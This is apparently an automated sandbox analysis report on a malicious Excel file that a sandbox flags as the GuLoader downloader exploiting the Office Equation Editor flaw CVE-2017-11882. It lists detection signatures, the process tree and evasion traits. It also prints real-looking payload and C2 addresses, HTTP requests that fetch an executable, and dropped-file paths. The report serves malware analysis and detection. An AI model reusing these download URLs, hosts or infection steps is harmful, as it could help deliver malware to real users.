Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx

Overview

General Information

Sample Name:DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
Analysis ID:457648
MD5:ab57abd998267541ce6d27ecf2b85ba5
SHA1:4840478268380cf80e55d5ca019d108236d100a6
SHA256:6af62a337c410357a5f49294e98ead83092c6a1d3b73e58c2f56ea5abfdd745e
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1320 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2220 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2328 cmdline: 'C:\Users\Public\vbc.exe' MD5: 9318CD06A9A0B788DC043A63C97D4FCE)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Overview

    Exploits:

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2220, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
    Sigma detected: File Dropped By EQNEDT32EXEShow sources
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2220, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

    System Summary:

    barindex
    Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2220, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2328
    Sigma detected: Execution from Suspicious FolderShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2220, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2328

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Found malware configurationShow sources
    Source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin"}
    Multi AV Scanner detection for submitted fileShow sources
    Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsxReversingLabs: Detection: 30%

    Exploits:

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 68MB

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 02 Aug 2021 05:13:25 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Sun, 01 Aug 2021 20:24:21 GMTETag: "3f478-5c8853ce1d903"Accept-Ranges: bytesContent-Length: 259192Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 b0 7a 59 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 03 00 00 90 00 00 00 00 00 00 88 13 00 00 00 10 00 00 00 50 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 10 00 00 65 52 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 46 03 00 28 00 00 00 00 60 03 00 f2 70 00 00 00 00 00 00 00 00 00 00 58 e0 03 00 20 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 3a 03 00 00 10 00 00 00 40 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 94 0b 00 00 00 50 03 00 00 10 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f2 70 00 00 00 60 03 00 00 80 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 180.214.239.39 180.214.239.39
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: GET /msexcel/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.239.39
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emfJump to behavior
    Source: global trafficHTTP traffic detected: GET /msexcel/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
    Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: .svchost[1].exe.4.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: .svchost[1].exe.4.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: 3F47FD52.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
    Source: .svchost[1].exe.4.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: .svchost[1].exe.4.drString found in binary or memory: https://www.digicert.com/CPS0

    System Summary:

    barindex
    Office equation editor drops PE fileShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00275798 NtAllocateVirtualMemory,6_2_00275798
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002757986_2_00275798
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002740216_2_00274021
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00277C026_2_00277C02
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00277C0D6_2_00277C0D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002728776_2_00272877
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002740506_2_00274050
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027245F6_2_0027245F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002790586_2_00279058
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027489B6_2_0027489B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00274CF46_2_00274CF4
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002790D76_2_002790D7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027792B6_2_0027792B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027352B6_2_0027352B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00273D146_2_00273D14
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027796F6_2_0027796F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027916F6_2_0027916F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027554D6_2_0027554D
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002739D76_2_002739D7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00277A0B6_2_00277A0B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002726556_2_00272655
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00274AAA6_2_00274AAA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00279AB96_2_00279AB9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002746B86_2_002746B8
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00274ADA6_2_00274ADA
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00277B346_2_00277B34
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027433C6_2_0027433C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00278F4F6_2_00278F4F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00278F5C6_2_00278F5C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00273BB66_2_00273BB6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00271BF76_2_00271BF7
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00271BF96_2_00271BF9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002783CF6_2_002783CF
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002773CC6_2_002773CC
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00278FD66_2_00278FD6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00277BDB6_2_00277BDB
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: .svchost[1].exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: vbc.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@4/19@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDDD0.tmpJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsxReversingLabs: Detection: 30%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsxStatic file information: File size 1163264 > 1048576
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr
    Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\bayrerss.pdb source: .svchost[1].exe.4.dr

    Data Obfuscation:

    barindex
    Yara detected GuLoaderShow sources
    Source: Yara matchFile source: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00421041 push ss; retf 6_2_00421042
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00422433 push eax; iretd 6_2_004224A1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004200E2 push eax; iretd 6_2_004200E5
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004210A8 push ebx; retf 6_2_004210AE
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00421D79 pushfd ; iretd 6_2_00421D97
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00405D8C push eax; retf 6_2_00405DC6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_004223E5 push eax; iretd 6_2_004224A1
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027540E pushad ; retf 6_2_00275419
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00272F61 push esi; ret 6_2_00272F63
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002783B8 push edx; ret 6_2_002783B9
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00278391 push edx; ret 6_2_00278392
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00270FFD push ebx; iretd 6_2_0027100C
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion:

    barindex
    Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00275798 NtAllocateVirtualMemory,6_2_00275798
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00274050 6_2_00274050
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027245F 6_2_0027245F
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027352B 6_2_0027352B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027433C 6_2_0027433C
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00273714 6_2_00273714
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00273BB6 6_2_00273BB6
    Source: C:\Users\Public\vbc.exeCode function: 6_2_002773CC 6_2_002773CC
    Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
